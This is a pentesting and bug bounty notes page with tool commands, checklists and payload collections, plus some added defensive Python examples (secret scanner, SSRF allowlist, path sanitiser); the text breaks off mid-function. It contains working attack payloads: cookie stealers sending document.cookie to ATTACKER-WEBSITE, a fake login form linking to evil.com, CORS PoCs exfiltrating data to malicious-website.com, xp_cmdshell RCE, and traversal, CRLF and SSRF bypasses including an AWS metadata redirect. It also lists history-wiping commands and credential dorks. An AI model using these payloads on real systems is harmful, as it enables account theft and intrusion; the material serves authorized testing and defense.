███████╗ █████╗ ███████╗██╗ ██╗ ██████╗
██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔════╝
█████╗ ███████║███████╗ ╚████╔╝ ██║ ███╗
██╔══╝ ██╔══██║╚════██║ ╚██╔╝ ██║ ██║
███████╗██║ ██║███████║ ██║ ╚██████╔╝
╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝
Made with <3 by Riccardo Malatesta (@seeu)
EasyG started out as a script that I use to automate some information gathering tasks for PenTesting and Bug Hunting; you can find it here. Now it's more than that.
Here I gather all the resources about PenTesting and Bug Bounty Hunting that I find interesting: notes, payloads and links.
- Blog / Writeups / News & more
- Safety tips
- Check-lists
- Content Discovery
- Tools
- Network
- Linux
- Web vulnerabilities
- XSS
- SQLi
- SSRF
- Authentication vulnerabilities
- Access control vulnerabilities and privilege escalation
- Directory Traversal
- Business logic vulnerabilities
- CORS
- Deserialization
- HTTP Host header attacks
- Abusing S3 Bucket Permissions
- GraphQL
- WordPress
- IIS - Internet Information Services
- Lotus Domino
- Git source code exposure
- Subdomain takeover
- Thick client vulnerabilities
- https://portswigger.net/research
- https://www.skeletonscribe.net
- https://cvetrends.com/
- https://wiki.owasp.org/index.php/Testing_Checklist
- https://packetstormsecurity.com/
- https://twitter.com/hashtag/bugbountytips
- https://securib.ee/
- https://samcurry.net/
- https://blog.intigriti.com/hackademy/xss-challenges/
- https://hackerone.com/hacktivity
- https://pentester.land/list-of-bug-bounty-writeups.html
- https://github.com/juliocesarfort/public-pentesting-reports
- https://pentestreports.com/
- https://pentestbook.six2dez.com/
- https://xcellerator.github.io/
- https://persistence-info.github.io/
- For RCE
  - Never upload a shell at first, you can be banned from a program. Just execute a `whoami` as a PoC, proceed with a shell if required/allowed.
- For stored XSS
  - `console.log()` is better than `alert()`, it makes less noise especially for stored XSS.
- For SQLi
  - Don't dump the entire db, you can be banned from a program. Just retrieve the db's name, version and/or other minor infos. Proceed with db dump only if required/allowed;
  - Don't use tautologies like `OR 1=1`, it can end up in a delete query or something dangerous. It's better to use `AND SLEEP(5)` or `te'+'st`.
- For subdomain takeovers
  - use as a PoC an html page like `9a69e2677c39cdae365b49beeac8e059.html` containing `<!-- PoC by seeu -->`
- Mobile Application Penetration Testing Cheat Sheet
- SMB-Checklist
- Win32 Offensive Cheatsheet
- Regexp Security Cheatsheet
- Cheat-Sheet - Active-Directory
- Copyright 1995
- Server: Apache 2.2
- Expired SSL Certificate
- "Internal" in hostname
- Shodan returns CVEs
- Nuclei template matches
- Integrations
- Application Libraries (usually JavaScript)
- Application: Custom Code or COTS
- Application Framework
- Web Hosting Software (Default creds, Web server misconfigurations, web exploits)
- Open Ports and Services (Default creds on services, service level exploits)
Multiple targets
- Run EasyG assetenum + take screenshots or open results in firefox
- Select the interesting targets, see Risk markers
Single target
- Test Register
- Test Login: 2FA, Password reset, Open Redirect & co.
- Upload Functions
- Broken Access Control, IDOR & co
- Content Types
- Look for multipart-forms
- Look for content type XML
- Look for content type json
- APIs
- Methods
- API Security Checklist
- Account Section
- Profile
- Stored XSS
- App Custom Fields
- Integrations
- SSRF, XSS
- Profile
- Errors
- OWASP Web Application Penetration Checklist v1.1
- Integrations (from 3rd party)
- XSS
- Self Uploads
- XML based (Docs/PDF)
- SSRF, XSS
- Image
- XSS, Shell
- Name
- Binary header
- Metadata
- XSS, Shell
- XML based (Docs/PDF)
- Where is data stored?
Some tips
- If the application is ASP.NET, search for `Appsettings.json`
- Use recursion. If you encounter a `401` response, search with waybackmachine
- Search for past reports in the same program
Check the tech of a target with
- Wappalyzer
- Webanalyze, port of Wappalyzer for command line: `./webanalyze -host example.com -crawl 1`
Tools
- feroxbuster: `feroxbuster -u https://example.com/ --proxy http://127.0.0.1:8080 -k -w wordlist.txt -s 200,403`
- dirsearch
- changedetection.io
- ffuf
Wordlists
To find more endpoints
- Apkleak to get endpoints from an apk
- Source2Url to get endpoints from a source code
- waymore more results from the Wayback Machine
- xnLinkFinder
- BurpJSLinkFinder
Google Dorking
- `ext:` to search for: php, php3, aspx, asp, jsp, xhtml, phtml, html, xsp, nsf, form;
- Search also for pdf, xlsx and similar, they may contain some infos;
- `site:` to target a website and its subdomains;
- `inurl:&` to search for parameters;
- `intitle:` to search interesting pages like admin, register, login etc.
- Dorking on Steroids: `"Seeing something unexpected? Take a look at the GitHub profile guide." "COMPANY-TARGET" site:http://github.com` [Reference]
- dorks_hunter
GitHub Dorking
- sensitive words: `password, api_key, access_key, dbpassword, dbuser, pwd, pwds, aws_access, key, token, credentials, pass, pwd, passwd, private, preprod, appsecret`
- languages: `json, bash, shell, java etc.`, example `HEROKU_API_KEY language:json`
- extensions: `bat, config, ini, env etc.`
- filename: `netrpc, .git-credentials, .history, .htpasswd, bash_history`
- Other dorks
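The dork lists above are also the checklist for what must never reach a public repository. As an added example (not part of EasyG), this Python scanner turns the same sensitive words, extensions and filenames into a local pre-push check; the sample file tree is constructed and the word `key` is left out of the word list because it matches almost everything.

```python
import re

# Word, extension and filename lists taken from the dork notes above
# (the bare word "key" is omitted on purpose: it matches nearly every line).
SENSITIVE_WORDS = ["password", "api_key", "access_key", "dbpassword", "dbuser",
                   "pwd", "passwd", "aws_access", "token", "credentials",
                   "private", "preprod", "appsecret"]
SENSITIVE_EXTENSIONS = (".bat", ".config", ".ini", ".env")
SENSITIVE_FILENAMES = {"netrpc", ".git-credentials", ".history", ".htpasswd",
                       "bash_history"}
# Values that are clearly not real secrets; skipped to keep the noise down.
PLACEHOLDERS = {"", "changeme", "xxx", "<redacted>", "null", "none", "example"}

# Matches key=value, "key": "value" and KEY: value where the key contains a
# sensitive word; group 1 is the whole key, group 2 the value.
KEY_VALUE_RE = re.compile(
    r"(?i)(\w*(?:" + "|".join(map(re.escape, SENSITIVE_WORDS)) + r")\w*)"
    r"[\"']?\s*[:=]\s*[\"']?([^\s\"',;]+)"
)


def scan_file(path, text):
    """Return findings as (path, line_no, key, value); line_no 0 marks a
    filename hit. In files with a sensitive extension (.env, .ini, ...) even
    placeholder-looking values are reported, since those files are the ones
    the extension dorks find."""
    findings = []
    name = path.rsplit("/", 1)[-1]
    if name in SENSITIVE_FILENAMES:
        findings.append((path, 0, "filename", name))
    risky_type = name.lower().endswith(SENSITIVE_EXTENSIONS)
    for line_no, line in enumerate(text.splitlines(), 1):
        m = KEY_VALUE_RE.search(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2)
        if value.lower() in PLACEHOLDERS and not risky_type:
            continue
        findings.append((path, line_no, key, value))
    return findings


def scan_repo(files):
    """files: {path: content}. Returns all findings across the tree."""
    out = []
    for path, text in files.items():
        out.extend(scan_file(path, text))
    return out


# Constructed sample tree (not a real project) that trips each dork category.
SAMPLE_FILES = {
    "config/appsettings.json": '{\n  "dbuser": "app",\n  "dbpassword": "hunter2",\n'
                               '  "token": "CHANGEME"\n}\n',
    "deploy/.env": "HEROKU_API_KEY=0123456789abcdef\nSERVICE_URL=https://preprod.internal\n",
    ".git-credentials": "https://user:s3cr3t@git.internal\n",
    "README.md": "Set the password in the admin panel.\n",
}

if __name__ == "__main__":
    for path, line_no, key, value in scan_repo(SAMPLE_FILES):
        print("%s:%d  %s = %s" % (path, line_no, key, value))
```

Run it over the working tree in a pre-commit hook and fail the commit on any finding; tune `PLACEHOLDERS` and the word list per project.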
For a temporary public server
For auths
- textverified.com for auths requiring a phone number
- temp-mail.org
- To have multiple email addresses using Gmail, you can add a `+` sign after your email's alias. For example: if your email is `janedoe@gmail.com` and you sign up for Twitter, you can sign up using `janedoe+twitter@gmail.com`. [Reference]
To find parameters
- Arjun detection of the parameters present in the application
- ParamSpider
Asset enumeration/discovery
- nmap
  - Discover everything + services: `nmap -p 1-65535 -sV -T4 -Pn -n -vv -iL target.txt -oX out.xml`
- bgp.he.net to find ASN + `amass intel -asn <ASN>`
- crt.sh
- Crtsh-Fetcher
  - To find new domains: `cat json.txt | jq -r '.[].common_name' | sed 's/\*//g' | sort -u | rev | cut -d "." -f 1,2 | rev | sort -u | tee out.txt`
- naabu
  - Discover everything faster: `naabu -l 1.txt -v -p - -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -c 1000 -rate 7000 -stats -o 1_o.txt`
- gobuster + all.txt by jhaddix
  - you can use gb.rb
- dnsx
  - Reverse DNS lookup: `cat ip.txt | dnsx -ptr -resp-only`
- VhostScan to discover virtual hosts
To find vulnerabilities
- Tplmap for SSTI exploitation
- CSRF PoC Generator
- BruteSpray: `python brutespray.py --file nmap.xml --threads 5 --hosts 5`
- cmd.aspx
- SearchSploit Port services vulnerability checks
- nuclei
  - Automatic Selection: `nuclei -u http://target.io -as`
  - Check for Exposed panels: `%USERPROFILE%\nuclei-templates\exposed-panels`
  - Check for Technologies: `%USERPROFILE%\nuclei-templates\technologies`
  - Check for more: `-t %USERPROFILE%\nuclei-templates\misconfiguration -t %USERPROFILE%\nuclei-templates\cves -t %USERPROFILE%\nuclei-templates\cnvd`
  - Use it in a workflow: `cat subdomains.txt | httpx | nuclei -t technologies`
- nuclei geeknik
- CMSeeK CMS Detection & Exploitation Suite
- ppfuzz a fast tool to scan client-side prototype pollution vulnerability
Decompilers
- VB Decompiler decompile a VB application
- ILSpy | dnSpy .NET decompilers
- Java Decompiler
- dex2jar decompile an .apk into .jar
- jadx-gui another tool for producing Java source code from Android Dex and Apk files
- apktool to unpack an apk
Desktop Application / Thick Client Penetration Testing
- testssl.sh useful for checking outdated ciphers & co.
- Process Hacker It helps to dump the exe memory and see what sensitive data is there
- Echo Mirage to monitor the network interactions of an application
- Wireshark
- Sigcheck check the signature of an executable
Android
- adb it is used to debug an android device
- HTTP Toolkit to see requests on a non-rooted or emulated device, as an alternative to burp suite
- Genymotion an android emulator
- Android Studio Android application development, useful also for the emulator
- Note: to start only the emulator, use commands such as `cd C:\Users\Riccardo\AppData\Local\Android\Sdk\emulator` followed by `emulator -avd Pixel_4_XL_API_30`
For Reporting
Other
- URL Decoder/Encoder
- base64encode.org
- Down or not
- DigitalOcean See Setting Up Your Ubuntu Box for Pentest and Bug Bounty Automation
- trashcompactor to remove URLs with duplicate functionality based on script resources included
- uro declutters url lists
- putty
- jdam - Structure-aware JSON fuzzing
- Impacket
- PCredz
- Visual Studio Code for Source Code Analysis
- beautifier.io for JavaScript Analysis
Used in easyg.rb
- amass
- subfinder
- github-subdomains
- crt.sh
- httprobe: `type subs.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -c 150 > out.txt`
- anew
- naabu: `naabu -v -list subs.txt -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -stats -o out.txt`
- gospider
- hakrawler
- Selenium
- nuclei: `nuclei -l httprobe_results.txt -t %USERPROFILE%\nuclei-templates\takeovers -t %USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml -o out.txt`
To add a domain + subdomains in advanced scopes: `^(.*\.)?test\.com$`
Cool extensions:
- Turbo Intruder
- HTTP Request Smuggler
- Wsdler to interact with SOAP
- InQL
- BurpCustomizer
- Software Version Reporter
- Software Vulnerability Scanner
- IP Rotate
- Autorize
- Active Scan++
- BurpJSLinkFinder
- Anonymous Cloud
- `ip route add <net_address_in_cidr> via <interface_gateway>`
- `route add <net_address_in_cidr> mask <net_address_mask_in_cidr> <interface_gateway>` (Windows)
- `nmap -sn <net_address_in_cidr>` Check hosts alive, adding `-A` you gather more info for a target
Linux Commands
- `netstat -tulpn` Show Linux network ports with process IDs (PIDs).
- `watch ss -stplu` Watch TCP, UDP open ports in real time with socket summary.
- `lsof -i` Show established connections.
- `macchanger -m MACADDR INTR` Change MAC address on Kali Linux.
- `ifconfig eth0 192.168.2.1/24` Set IP address in Linux.
- `ifconfig eth0:1 192.168.2.3/24` Add IP address to existing network interface in Linux.
- `ifconfig eth0 hw ether MACADDR` Change MAC address in Linux using ifconfig.
- `ifconfig eth0 mtu 1500` Change MTU size in Linux using ifconfig, change 1500 to your desired MTU.
- `dig -x 192.168.1.1` Dig reverse lookup on an IP address.
- `host 192.168.1.1` Reverse lookup on an IP address, in case dig is not installed.
- `dig @192.168.2.2 domain.com -t AXFR` Perform a DNS zone transfer using dig.
- `host -l domain.com nameserver` Perform a DNS zone transfer using host.
- `nbtstat -A x.x.x.x` Get hostname for IP address.
- `ip addr add 192.168.2.22/24 dev eth0` Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
- `tcpkill -9 host google.com` Blocks access to google.com from the host machine.
- `echo "1" > /proc/sys/net/ipv4/ip_forward` Enables IP forwarding, turns Linux box into a router – handy for routing traffic through a box.
- `echo "nameserver 8.8.8.8" > /etc/resolv.conf` Use Google DNS (resolv.conf expects `nameserver` lines).
Linux User Management
- `whoami` Shows currently logged in user on Linux.
- `id` Shows currently logged in user and groups for the user.
- `last` Shows last logged in users.
- `mount` Show mounted drives.
- `df -h` Shows disk usage in human readable output.
- `echo "user:passwd" | chpasswd` Reset password in one line.
- `getent passwd` List users on Linux.
- `strings /usr/local/bin/blah` Shows the printable strings in non-text files, e.g. what's in a binary.
- `uname -ar` Shows running kernel version.
- `PATH=$PATH:/my/new-path` Add a new PATH, handy for local FS manipulation.
- `history` Show bash history, commands the user has entered previously.
Linux File Commands
- `df -h blah` Display size of file / dir Linux.
- `diff file1 file2` Compare / Show differences between two files on Linux.
- `md5sum file` Generate MD5SUM Linux.
- `md5sum -c blah.iso.md5` Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
- `file blah` Find out the type of file on Linux, also displays if file is 32 or 64 bit.
- `dos2unix` Convert Windows line endings to Unix / Linux.
- `base64 < input-file > output-file` Base64 encodes input file and outputs a Base64 encoded file called output-file.
- `base64 -d < input-file > output-file` Base64 decodes input file and outputs a Base64 decoded file called output-file.
- `touch -r ref-file new-file` Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
- `rm -rf` Remove files and directories without prompting for confirmation.
Misc Commands
- `init 6` Reboot Linux from the command line.
- `gcc -o output input.c` Compile C code.
- `gcc -m32 -o output input.c` Cross compile C code, compile 32 bit binary on 64 bit Linux.
- `unset HISTFILE` Disable bash history logging (the variable bash uses is `HISTFILE`).
- `rdesktop X.X.X.X` Connect to RDP server from Linux.
- `kill -9 $$` Kill current session.
- `chown user:group blah` Change owner of file or dir.
- `chown -R user:group blah` Change owner of file or dir and all underlying files / dirs – recursive chown.
- `chmod 600 file` Change file / dir permissions, see [Linux File System Permissions](#linux-file-system-permissions) for details.
- `ssh user@X.X.X.X | cat /dev/null > ~/.bash_history` Clear bash history
Linux File System Permissions
- `777` `rwxrwxrwx` No restriction, global WRX, any user can do anything.
- `755` `rwxr-xr-x` Owner has full access, others can read and execute the file.
- `700` `rwx------` Owner has full access, no one else has access.
- `666` `rw-rw-rw-` All users can read and write but not execute.
- `644` `rw-r--r--` Owner can read and write, everyone else can read.
- `600` `rw-------` Owner can read and write, everyone else has no access.
Linux Directories
- `/` also known as "slash" or the root.
- `/bin` Common programs, shared by the system, the system administrator and the users.
- `/boot` Boot files, boot loader (grub), kernels, vmlinuz
- `/dev` Contains references to system devices, files with special properties.
- `/etc` Important system config files.
- `/home` Home directories for system users.
- `/lib` Library files, includes files for all kinds of programs needed by the system and the users.
- `/lost+found` Files that were saved during failures are here.
- `/mnt` Standard mount point for external file systems.
- `/media` Mount point for external file systems (on some distros).
- `/net` Standard mount point for entire remote file systems – nfs.
- `/opt` Typically contains extra and third party software.
- `/proc` A virtual file system containing information about system resources.
- `/root` root user's home dir.
- `/sbin` Programs for use by the system and the system administrator.
- `/tmp` Temporary space for use by the system, cleaned upon reboot.
- `/usr` Programs, libraries, documentation etc. for all user-related programs.
- `/var` Storage for all variable files and temporary files created by users, such as log files, mail queue, print spooler, web servers, databases etc.
Linux Interesting Files / Directories
- `/etc/passwd` Contains local Linux users.
- `/etc/shadow` Contains local account password hashes.
- `/etc/group` Contains local account groups.
- `/etc/init.d/` Contains service init scripts – worth a look to see what's installed.
- `/etc/hostname` System hostname.
- `/etc/network/interfaces` Network interfaces.
- `/etc/resolv.conf` System DNS servers.
- `/etc/profile` System environment variables.
- `~/.ssh/` SSH keys.
- `~/.bash_history` User's bash history log.
- `/var/log/` Linux system log files are typically stored here.
- `/var/adm/` UNIX system log files are typically stored here.
- `/var/log/apache2/access.log` Apache access log file typical path.
- `/var/log/httpd/access.log` Apache access log file typical path.
- `/etc/fstab` File system mounts.
- Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read
- For hidden inputs: `accesskey="X" onclick="alert(1)"` then press ALT+SHIFT+X on Windows / CTRL+ALT+X on OS X
- For mobile applications: try to use as a vector the name of the phone with a payload like `"/><script>alert(1)</script>`
- For desktop applications: try to use as a vector the SSID with a payload like `"/><img src=x onerror=alert(1)>`
Tools
- xsscrapy
- XSS Hunter for blind XSS
- AwesomeXSS
- ppfuzz a fast tool to scan client-side prototype pollution vulnerability
CSP bypass
Bypasses
- `https://www.googleapis.com/customsearch/v1?callback=alert(document.domain)`
- JSFuck
- Path Relative style sheet injection
- Cross-site scripting (XSS) cheat sheet
- Shortest rXSS possible
- If privileges are required, see if you can chain the XSS with a CSRF
Swagger XSS
- swagger-api/swagger-ui#1262
- swagger-api/swagger-ui#3847
  - `?url=https://raw.githubusercontent.com/seeu-inspace/easyg/main/XSS%20all%20the%20things/swag-test.json`
- Hacking Swagger-UI - from XSS to account takeovers
  - `?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3NlZXUtaW5zcGFjZS9lYXN5Zy9tYWluL1hTUyUyMGFsbCUyMHRoZSUyMHRoaW5ncy9zd2FnLXRlc3QueWFtbCIKfQ==`
- Nuclei template: `%USERPROFILE%\nuclei-templates\exposures\apis\swagger-api.yaml`
CRLF injection [Reference]
- `/%0D%0AX-XSS-Protection%3A%200%0A%0A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--`
- `/%E5%98%8D%E5%98%8AX-XSS-Protection%3A%200%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--`
- Nuclei template: `%USERPROFILE%\nuclei-templates\vulnerabilities\generic\crlf-injection.yaml`
Cross Site Tracing
- If cookies are protected by the HttpOnly flag but the TRACE method is enabled, a technique called Cross Site Tracing can be used. Reference: https://owasp.org/www-community/attacks/Cross_Site_Tracing
Blind XSS
- Insert a payload in the User-Agent, try with the match/replace rule
- Other endpoints: pending review comments, feedback
DoS
`%22%27%22%3E%3CMETA%20HTTP-EQUIV%3Drefresh%20CONTENT%3D1%3E%3F%3D`
This could make the page refresh quickly and endlessly, which can trigger a WAF block and is a potential DoS.
Payloads
- HTML inj: `<p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a><br/><img src=http://evil.com style="visibility:hidden">`
- iframe + base64 encoded SVG: `<iframe src="data:image/svg+xml;base64,<BASE64-ENCODED-SVG>"></iframe>` (the encoded SVG body is not reproduced here)
- Cookie stealers
  - `fetch('https://ATTACKER-WEBSITE', {method: 'POST',mode: 'no-cors',body:document.cookie});`
  - `document.write('<img src="http://ATTACKER-WEBSITE/?cookie=' + document.cookie + '" />')`
  - `<img src=x onerror=this.src='http://ATTACKER-WEBSITE/?'+document.cookie;>`
Tools
- SQLMap: `sqlmap -u https://vulnerable/index.php?id=1`
  - `--tables` (to see db)
  - `-D DATABASE_NAME -T TABLE_NAME --dump` (to see data)
  - `--forms --batch --crawl=10 --random-agent --level=5 --risk=3` (to crawl)
RCE
```sql
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell 'COMMAND';
```
```sql
EXEC sp_configure 'allow updates', 0
RECONFIGURE
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 1
GO
RECONFIGURE
GO
xp_cmdshell 'COMMAND';
```
SSRF with blacklist-based input filters bypass: Some applications block input containing hostnames like `127.0.0.1` and `localhost`, or sensitive URLs like `/admin`. In this situation, you can often circumvent the filter using various techniques:
- Using an alternative IP representation of `127.0.0.1`, such as `2130706433`, `017700000001`, or `127.1`;
- Registering your own domain name that resolves to `127.0.0.1`. You can use `spoofed.burpcollaborator.net` for this purpose, or the domain `firefox.fr`, which is a DNS name that points to `127.0.0.1`;
- Obfuscating blocked strings using URL encoding or case variation.
SSRF with whitelist-based input filters bypass
- You can embed credentials in a URL before the hostname, using the `@` character. For example: `https://expected-host@evil-host`.
- You can use the `#` character to indicate a URL fragment. For example: `https://evil-host#expected-host`.
- You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: `https://expected-host.evil-host`.
- You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
- You can use combinations of these techniques together.
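As an added example (not code from EasyG), the Python below shows why the substring blacklist at the top of this section fails and what an allowlist check that survives every bypass listed above looks like. The allowlisted host, the DNS answers and the resolver function are constructed so that it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist: the only host this application is meant to fetch from.
ALLOWED_HOSTS = {"expected-host.example"}


def canonical_ip(host):
    """Return the address an IP literal really denotes, or None for a hostname.

    ipaddress only accepts dotted-quad/IPv6 text, but the libc parser used by
    most HTTP clients also takes 2130706433, 017700000001 (octal) and 127.1,
    so a filter must canonicalise through the same parser before comparing.
    """
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        packed = socket.inet_aton(host)          # accepts the legacy forms
    except OSError:
        return None
    return ipaddress.IPv4Address(packed)


def blacklist_blocks(url):
    """The substring blacklist described above; every listed bypass gets past it."""
    lowered = url.lower()
    return any(bad in lowered for bad in ("127.0.0.1", "localhost", "/admin"))


def allowlist_accepts(url, resolve):
    """Strict allowlist check; resolve(host) -> list of IP strings (injected so
    the example runs offline). Returns (accepted, reason).

    Each rejection maps to one bypass in the text: userinfo
    (expected-host@evil-host), fragment (evil-host#expected-host), DNS
    hierarchy (expected-host.evil-host), IP literals in any spelling, and
    names that resolve into loopback, private or link-local ranges.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials before hostname"
    if parts.fragment:
        return False, "fragment in URL"
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return False, "no host"
    if canonical_ip(host) is not None:
        return False, "IP literal instead of an allowlisted name"
    if host not in ALLOWED_HOSTS:                # exact match, never endswith/contains
        return False, "host %r not allowlisted" % host
    # Check where the name points: a domain under an attacker's control can be
    # made to resolve to 127.0.0.1 or 169.254.169.254 (cloud metadata). Apply
    # this to the address actually connected to, or DNS rebinding defeats it.
    for ip in resolve(host):
        if not ipaddress.ip_address(ip).is_global:
            return False, "%s resolves to non-public %s" % (host, ip)
    return True, "ok"


def constructed_resolver(host):
    """Stand-in for DNS (constructed data, no network): the allowlisted name
    points to a public address, everything else to loopback."""
    return ["8.8.8.8"] if host == "expected-host.example" else ["127.0.0.1"]


def demo():
    """Run the bypasses from this section through both filters.
    Returns {url: (blacklist_blocked, allowlist_accepted)}."""
    bypasses = [
        "http://2130706433/", "http://017700000001/", "http://127.1/",
        "https://expected-host.example@evil-host/",
        "https://evil-host#expected-host.example",
        "https://expected-host.example.evil-host/",
    ]
    return {u: (blacklist_blocks(u), allowlist_accepts(u, constructed_resolver)[0])
            for u in bypasses}


if __name__ == "__main__":
    for url, (blocked, accepted) in demo().items():
        print("%-45s blacklist blocks: %-5s allowlist accepts: %s" % (url, blocked, accepted))
```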
Other tips
- By combining it with an open redirect, you can bypass some restrictions. An example: `http://vulnerable.com/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos`
- Open Redirect Bypass:
- For AWS, bypass some restrictions by hosting this PHP page (Reference): `<?php header('Location: http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role', TRUE, 303); ?>`
- If everything fails, look for assets pointing to internal IPs. You can usually find these via CSP headers, JS files, Github, shodan/censys etc. [Reference]
- SSRF (Server Side Request Forgery) testing resources
Burp extensions
- Multi-factor authentication
  - Try to intercept the response and modify the status to `200`;
  - Bruteforce.
- Password reset
  - Change the `Host` with the host of your server. The request for a password reset might use the `Host` value for the link with the reset token;
  - Try with headers like `X-Forwarded-Host:`.
- Password change
- Keeping users logged in
In the context of web applications, access control is dependent on authentication and session management:
- Authentication identifies the user and confirms that they are who they say they are;
- Session management identifies which subsequent HTTP requests are being made by that same user;
- Access control determines whether the user is allowed to carry out the action that they are attempting to perform.
From a user perspective, access controls can be divided into the following categories:
- Vertical access controls: mechanisms that restrict access to sensitive functionality that is not available to other types of users
- Horizontal access controls: mechanisms that restrict access to resources to the users who are specifically allowed to access those resources
- Context-dependent access controls: restrict access to functionality and resources based upon the state of the application or the user's interaction with it
Tools
- Autorize
- Authz
- UUID Detector
- Check also endpoints in JS files
- simple case: `https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini`
- absolute path: `https://insecure-website.com/loadImage?filename=/etc/passwd`
- stripped non-recursively: `https://insecure-website.com/loadImage?filename=....//....//....//etc/passwd`
- superfluous URL-decode: `https://insecure-website.com/loadImage?filename=..%252f..%252f..%252fetc/passwd`
- validation of start of path: `https://insecure-website.com/loadImage?filename=/var/www/images/../../../etc/passwd`
- validation of file extension with null byte bypass: `https://insecure-website.com/loadImage?filename=../../../etc/passwd%00.png`
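An added example, not part of EasyG: a Python `safe_join` that decodes the filename completely and canonicalises it before any check, so each payload above is either rejected or left harmless, shown beside the one-pass strip that the "stripped non-recursively" case defeats. The base directory `/var/www/images` is taken from the URLs above and the test input is constructed; no file system access is needed.

```python
import posixpath
from urllib.parse import unquote

IMAGE_ROOT = "/var/www/images"   # base directory used by the URLs above


def strip_once(filename):
    """The flawed defence behind 'stripped non-recursively': a single pass of
    removing '../' turns '....//' into '../', so the traversal survives."""
    return filename.replace("../", "")


def safe_join(base, filename, allowed_suffixes=(".png", ".jpg")):
    """Return the canonical path of filename under base, or None if unsafe.

    Order matters: decode completely, reject NUL, unify separators, reject
    absolute paths, then normalise and only then test the result. Testing
    the normalised form defeats '....//' and '%252f'; rejecting absolute
    paths defeats '/etc/passwd' and the '/var/www/images/../../..' prefix
    trick; rejecting NUL before the suffix test defeats '%00.png'.
    If base may contain symlinks, resolve with os.path.realpath at open time
    and repeat the containment test on the result.
    """
    decoded = filename
    for _ in range(3):                       # peel stacked percent-encoding
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    if "\x00" in decoded:                    # C-string truncation trick
        return None
    decoded = decoded.replace("\\", "/")     # '..\..\windows\win.ini'
    if decoded.startswith("/"):
        return None
    rel = posixpath.normpath(decoded)
    if rel in (".", "..") or rel.startswith("../"):
        return None
    if not rel.lower().endswith(allowed_suffixes):
        return None
    return posixpath.join(base, rel)


def compare(payloads):
    """For each payload: what the one-pass strip leaves vs. what safe_join
    returns (None = rejected). Usable as a regression test for the filter."""
    return {p: (strip_once(p), safe_join(IMAGE_ROOT, p)) for p in payloads}


# The filename values from the URLs above (constructed test input).
PAYLOADS = [
    r"..\..\..\windows\win.ini",
    "/etc/passwd",
    "....//....//....//etc/passwd",
    "..%252f..%252f..%252fetc/passwd",
    "/var/www/images/../../../etc/passwd",
    "../../../etc/passwd%00.png",
]

if __name__ == "__main__":
    for payload, (stripped, safe) in compare(PAYLOADS).items():
        print("%-40s strip_once -> %-25s safe_join -> %s" % (payload, stripped, safe))
```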
Examples:
- Excessive trust in client-side controls
- 2FA broken logic
- Failing to handle unconventional input
- Inconsistent security controls
- Weak isolation on dual-use endpoint
- Password reset broken logic
- Insufficient workflow validation
- Flawed enforcement of business rules
- Authentication bypass via encryption oracle
Classic CORS vulnerability
```html
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','$url/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script>
```
CORS vulnerability with null origin
```html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='malicious-website.com/log?key='+this.responseText;
};</script>">
</iframe>
```
CORS vulnerability with trusted insecure protocols
```html
<script>
document.location="http://stock.$your-lab-url/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://$your-lab-url/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://$exploit-server-url/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```
Tools
- Corsy Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations
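An added example, not code from EasyG or from the labs: the server-side origin decision that each of the three PoCs above relies on, written in Python as the three misconfigurations (reflecting any `Origin`, accepting `null`, trusting any subdomain regardless of scheme) beside a strict check that gives none of them a credentialed response. The trusted origins are constructed.

```python
from urllib.parse import urlsplit

# Constructed trust configuration for the example.
TRUSTED_ORIGINS = {"https://app.example"}
TRUSTED_PARENT = "example"        # subdomains of this zone are first-party

# Headers that, together with Allow-Origin, let the browser expose a
# credentialed response. Vary: Origin keeps caches from serving one
# origin's answer to another.
CREDENTIALED = {"Access-Control-Allow-Credentials": "true", "Vary": "Origin"}


def grant(origin):
    return dict(CREDENTIALED, **{"Access-Control-Allow-Origin": origin})


def reflect_any(origin):
    """Misconfiguration 1 ('classic'): echo whatever Origin arrives."""
    return grant(origin) if origin else {}


def allow_null_too(origin):
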